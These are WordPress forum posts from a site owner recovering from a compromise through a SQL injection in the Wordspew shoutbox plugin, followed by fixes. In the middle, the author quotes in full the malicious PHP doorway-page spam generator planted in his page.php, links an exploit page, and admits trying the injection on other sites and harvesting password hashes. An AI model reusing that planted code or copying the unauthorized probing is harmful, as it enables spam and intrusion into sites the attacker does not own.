idahofallzcom

It seems settled now, WordPress’ 2.3.3 update fixed xmlrpc.php vulnerabilities, and Pierre released 3.72 wordspew to fix the sql injection.

I did attempt the injection on some other sites, just grayhatting, and got back the database usernames and passwords, but the passwords were all in md5 hash, and I could not get a single one to decipher in the various free engines.

I wonder how the attacker gained access? Were they able to login under some of my users who created weak passwords? After I updated users with stronger passwords some of them still got cracked again, and none of my users were admin yet some spam links were pasted into my footer, and my entire page.php was replaced by malicious code. My password was a strong mix, so I don’t know how they were able to get in that far.

Perhaps they got in as a low level user, then used another hack to find my admin info?

Maybe will never know…

So far so good.

Maybe one last bit of advice and wisdom for future inquiries. My site is one of the few that really use that shoutbox, since it’s locally focused on a city.

I downloaded Rudd-O’s wordspew version 2.4 (latest) cuz it says it corrects the SQL injection that pierr’es had. However, Pierre had some nicer anti-spam measures, and the ability to mark someone’s IP as a spammer, then they could not post anymore. Rudd-O’s does not, and I’m getting spam dropped every minute. That’s a no-go.

So I went back to Pierre’s blog, again I was using the outdated 3.01 so I see Pierre is up to version 3.71. I’m reading through his changelog

https://pierre.sudarovich.free.fr/index.php/2006/02/28/ajax-shoutbox/

and it appears at versions 3.3 and 3.34 he fixed some SQL vulnerabilities. Unfortunately I cannot tell if he fixed the SQL vulnerability that allowed my site to get hacked.

Can anyone verify yay or nay if the 3.71 wordspew from pierre is secure from that SQL vulnerability (which BTW I found: https://www.milw0rm.com/exploits/5039 )

thanks

Cool, I had not replaced the xmlrpcs.php yet so we’re good. I think I can do what you’re describing, but as you suggested I’ll wait to see if I get hacked once more before trying.

I’ll update later today if anything happens or not. The help is invaluable and much appreciated!

Okay, as I said I completely removed the xmlrpc.php file, how do I do this logging? I am reading that other thread and you said to email you for the instructions to do that? do i need to put xmlrpc.php back in there under a renamed filename or ?

Thanks for the help!

I did not re-enable wordspew, I of course want to wait to make sure I’m not being attacked anymore. I of course also learned my lesson and when I do reenble wordspew will go with the latest version and will deal with the functionality issues at that time.

i went to delete the wordspew folder from my plugins directly, and it is gone already. why would the hacker delete it? i looked in my other plugin folders and did not see it moved anywhere. it does not appear in my admin panel plugins activation page, either.

spybot found not a single issue on my system. i reinstalled my pc a few weeks ago so it is fairly fresh.

i had one other admin account, but i demoted that account to a writer and changed it’s password.

i’ll try changing my passwords again, but i’ve got a feeling this is not over.

What is the hole here?

Dammit! I just checked my site about 30 minutes ago, no spam links. I check a moment ago again, and the spam links are back in my footer. I check footer.php and that same eval() link is there.

HELP!?!? What is the hole here?

I went to bed last night hoping the activity was over, but it’s not. This morning there where three more post drafts saved, each taunting me for being hacked by worldhackerz.net, each under different existing usernames. I saved a local copy of the xmlprc.php last night and completely deleted it, and I disabled the wordspew plugin. I’m running spybot and ad-aware on my system now.

Any other advice? I’m also still wondering “what’s 711 here and there?”

what’s 711 here and there?

cool, i deleted the xmlrpc.php and the footer spam links, so far so good but it’s still early

my host sent me the record showing i was attacked through wordspew chatbox. i was running a slightly older 3.01 version cuz the new one kept blocking users.

i would like to ensure the latest does not have the same attack vector as 3.01, though

man and it continues

I noticed my pages weren’t loading, and I was generating HUGE error_logs. I deleted the error_log and two seconds later it was up to 62 mb. I finally got it downloaded and found errors related to a script running in page.php

This is what I found in my page.php:

<?php
$tpl = "/home/.numnod/mwsmedia/mattselznick.com/gfx/t-m-p.html";
$repl = "<REPL>";
$w1 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w2 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w3 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w4 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w5 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w6 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w7 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w8 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w9 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w10 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w11 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w12 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$w13 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$keys = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
$wr1 = $w1[rand(0, count($w1)-1)];
$wr2 = $w2[rand(0, count($w2)-1)];
$wr3 = $w3[rand(0, count($w3)-1)];
$wr4 = $w4[rand(0, count($w4)-1)];
$wr5 = $w5[rand(0, count($w5)-1)];
$wr6 = $w6[rand(0, count($w6)-1)];
$wr7 = $w7[rand(0, count($w7)-1)];
$wr8 = $w8[rand(0, count($w8)-1)];
$wr9 = $w9[rand(0, count($w9)-1)];
$wr10 = $w10[rand(0, count($w10)-1)];
$wr11 = $w11[rand(0, count($w11)-1)];
$wr12 = $w12[rand(0, count($w12)-1)];
$wr13 = $w13[rand(0, count($w13)-1)];
$q = $_GET['go'];
$q = ereg_replace(".htm", "", $q);
$q = ereg_replace("-", " ", $q);
$fp = fopen($tpl, "r");
$fin = '';
while (!feof($fp))
     $fin .= fgets($fp, 1024);
fclose($fp);
$fin = ereg_replace($repl, $q, $fin);
$rd = rand(0,10000);
  $rd = $rd."";
 $rd2 = rand(0,10000);
  $rd2 = $rd2."";
 $rd3 = rand(0,10000);
  $rd3 = $rd3."";
 $rd4 = rand(0,10000);
  $rd4 = $rd4."";
 $rd5 = rand(0,10000);
  $rd5 = $rd5."";
$fin = ereg_replace("<SOME>", $rd , $fin);
$fin = ereg_replace("<SOME2>", $rd2 , $fin);
$fin = ereg_replace("<SOME3>", $rd3 , $fin);
$fin = ereg_replace("<SOME4>", $rd4 , $fin);
$fin = ereg_replace("<SOME5>", $rd5 , $fin);
$wr1l = ereg_replace(" ","-" , $wr1);
$fin = ereg_replace("<KEY1>", $wr1, $fin);
$fin = ereg_replace("<KEY1l>", $wr1l, $fin);
$wr2l = ereg_replace(" ","-" , $wr2);
$fin = ereg_replace("<KEY2>", $wr2, $fin);
$fin = ereg_replace("<KEY2l>", $wr2l, $fin);
$wr3l = ereg_replace(" ","-" , $wr3);
$fin = ereg_replace("<KEY3>", $wr3, $fin);
$fin = ereg_replace("<KEY3l>", $wr3l, $fin);
$wr4l = ereg_replace(" ","-" , $wr4);
$fin = ereg_replace("<KEY4>", $wr4, $fin);
$fin = ereg_replace("<KEY4l>", $wr4l, $fin);
$wr5l = ereg_replace(" ","-" , $wr5);
$fin = ereg_replace("<KEY5>", $wr5, $fin);
$fin = ereg_replace("<KEY5l>", $wr5l, $fin);
$wr6l = ereg_replace(" ","-" , $wr6);
$fin = ereg_replace("<KEY6>", $wr6, $fin);
$fin = ereg_replace("<KEY6l>", $wr6l, $fin);
$fin = ereg_replace("<KEY7>", $wr7, $fin);
$fin = ereg_replace("<KEY8>", $wr8, $fin);
$fin = ereg_replace("<KEY9>", $wr9, $fin);
$fin = ereg_replace("<KEY10>", $wr10, $fin);
$fin = ereg_replace("<KEY11>", $wr11, $fin);
$fin = ereg_replace("<KEY12>", $wr12, $fin);
$fin = ereg_replace("<KEY13>", $wr13, $fin);
$n = 10;
$links = "";
for ($i=0; $i<$n; $i++)
{
  $rankey = trim($keys[rand(0, count($keys)-1)]);
  $ranhref = ereg_replace(" ", "-", $rankey)."";
  $links = $links." <a href='./?go=$ranhref.htm'>$rankey</a><br>";
}
$fin = ereg_replace("<LINK>", $links, $fin);
echo $fin;
?>

Man I’m getting hacked hard here, any advice to batten down the hatches?

resolved this with plugin: Restrict author access to edit comments

https://www.laboratoriocaffeina.it/development/2007/07/20/restrict-authors-access-to-edit-comments-the-plugin.html

I ended up using the plugin “Restrict Author Access to Edit Comments” which does the job. Folks can still click to that page but they meet a “not authorized” text instead of all the links. It works well enough, thanks plugin author!

https://www.laboratoriocaffeina.it/development/2007/07/20/restrict-authors-access-to-edit-comments-the-plugin.html

It might help you understand that search engines do see your WordPress site as HTML because the WP engine processes PHP and MySQL data then returns HTML code to the browser.

Do a View > Source code in your browser and you will see your posts are presented in HTML code such as h2 and paragraph tags. This is similar enough to what those search engine bots see.

2 errr in regards to this step, just to be crystal clear to newbies, there was a php code section at the top of css.css that you delete entirely, and you will notice smaller php code chunks in the css settings, usually for the color specifications.

delete those php code chunks also, and replace them with normal hexadecimal color codes (#ffffff or #abcdef)

Eeek! I need to update and resolve this.

I did as suggested and visited those forums.

Being polite and respectful, I first searched through the forums for similar topics.

It took a little digging but I was able to find another person who solved this by:

1 renamed the wordspew’s css.php into a css.css

2 deleted the PHP references in the css.css

3 within the main php file, changed the single call to css.php to of course css.css

Only drawback is that your color changes made within the wordpress admin page to not work. Not a big deal, especially for folks like me that like to tweak those things at code level anyways.

Thanks for the tip carnold and thanks for having those forums up and helping folks Gamerz